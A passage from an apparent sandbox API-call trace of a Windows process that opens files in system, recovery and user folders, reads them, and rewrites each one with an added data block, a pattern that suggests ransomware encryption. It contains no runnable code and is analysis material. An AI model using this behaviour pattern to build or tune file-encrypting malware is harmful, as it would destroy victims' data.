(in: hFile=0x1e4, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0161.764] CloseHandle (hObject=0x1e4) returned 1 [0161.765] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.766] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.766] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x16a [0161.766] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.766] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.766] ReleaseMutex (hMutex=0x168) returned 1 [0161.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0161.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fedc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0161.767] ReadFile (in: hFile=0x1e4, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x2d5f2bc*=0x16a, lpOverlapped=0x0) returned 1 [0161.768] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0161.768] WriteFile (in: hFile=0x1e4, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6f2, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6f2, lpOverlapped=0x0) returned 1 [0161.768] CloseHandle (hObject=0x1e4) returned 1 [0161.769] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.770] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.770] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x588124 [0161.770] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.770] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.770] ReleaseMutex (hMutex=0x168) returned 1 [0161.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0161.771] ReadFile (in: hFile=0x1e4, lpBuffer=0x27fc5d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0161.784] ReadFile (in: hFile=0x1e4, lpBuffer=0x27fc5d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0161.882] ReadFile (in: hFile=0x1e4, lpBuffer=0x27fc5d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0161.882] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x586124 [0161.882] ReadFile (in: hFile=0x1e4, lpBuffer=0x25abb78, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0161.922] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x586124 [0161.924] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x3be0000 [0161.930] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0161.931] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0161.931] WriteFile (in: hFile=0x1e4, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.932] WriteFile (in: hFile=0x1e4, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.932] WriteFile (in: hFile=0x1e4, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0161.932] CloseHandle (hObject=0x1e4) returned 1 [0161.933] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.934] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.934] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x165257 [0161.934] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.934] ReleaseMutex (hMutex=0x168) returned 1 [0161.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0161.935] ReadFile (in: hFile=0x1e4, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0161.958] ReadFile (in: hFile=0x1e4, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.967] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x164257 [0161.967] ReadFile (in: hFile=0x1e4, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0161.978] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x164257 [0161.979] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0161.979] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0161.980] WriteFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0161.980] WriteFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0161.980] CloseHandle (hObject=0x1e4) returned 1 [0161.980] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.982] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.982] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc89b1 [0161.982] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.982] ReleaseMutex (hMutex=0x168) returned 1 [0161.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0161.982] ReadFile (in: hFile=0x1e4, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0162.023] ReadFile (in: hFile=0x1e4, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.072] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc79b1 [0162.072] ReadFile (in: hFile=0x1e4, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.194] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc79b1 [0162.195] WriteFile (in: hFile=0x1e4, lpBuffer=0x286fee8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.195] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0162.195] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0162.196] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.196] CloseHandle (hObject=0x1e4) returned 1 [0162.196] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0162.198] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.198] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2fe [0162.198] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.198] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.198] ReleaseMutex (hMutex=0x168) returned 1 [0162.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0162.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0162.198] ReadFile (in: hFile=0x1e4, lpBuffer=0x2663858, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2d5f2bc*=0x2fe, lpOverlapped=0x0) returned 1 [0162.267] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0162.267] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb48*, nNumberOfBytesToWrite=0x886, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb48*, lpNumberOfBytesWritten=0x2d5f2d0*=0x886, lpOverlapped=0x0) returned 1 [0162.267] CloseHandle (hObject=0x1e4) returned 1 [0162.267] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0162.269] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.269] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x306000 [0162.269] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.269] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.269] ReleaseMutex (hMutex=0x168) returned 1 [0162.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boot.sdi", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0162.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boot.sdi", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boot.sdi", lpUsedDefaultChar=0x0) returned 8 [0162.269] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0162.393] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0162.425] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0162.439] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x304000 [0162.439] ReadFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0162.452] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x304000 [0162.453] WriteFile (in: hFile=0x1e4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0162.454] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0162.454] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0162.455] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0162.456] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0162.456] CloseHandle (hObject=0x1e4) returned 1 [0162.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0162.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x102a0 [0162.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.458] ReleaseMutex (hMutex=0x168) returned 1 [0162.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wscRGB.icc", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0162.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wscRGB.icc", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wscRGB.icc", lpUsedDefaultChar=0x0) returned 10 [0162.459] ReadFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.464] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf2a0 [0162.465] ReadFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.471] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf2a0 [0162.471] WriteFile (in: hFile=0x1e4, lpBuffer=0x25abcd8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abcd8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.472] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0162.472] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665898*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665898*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.472] CloseHandle (hObject=0x1e4) returned 1 [0162.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 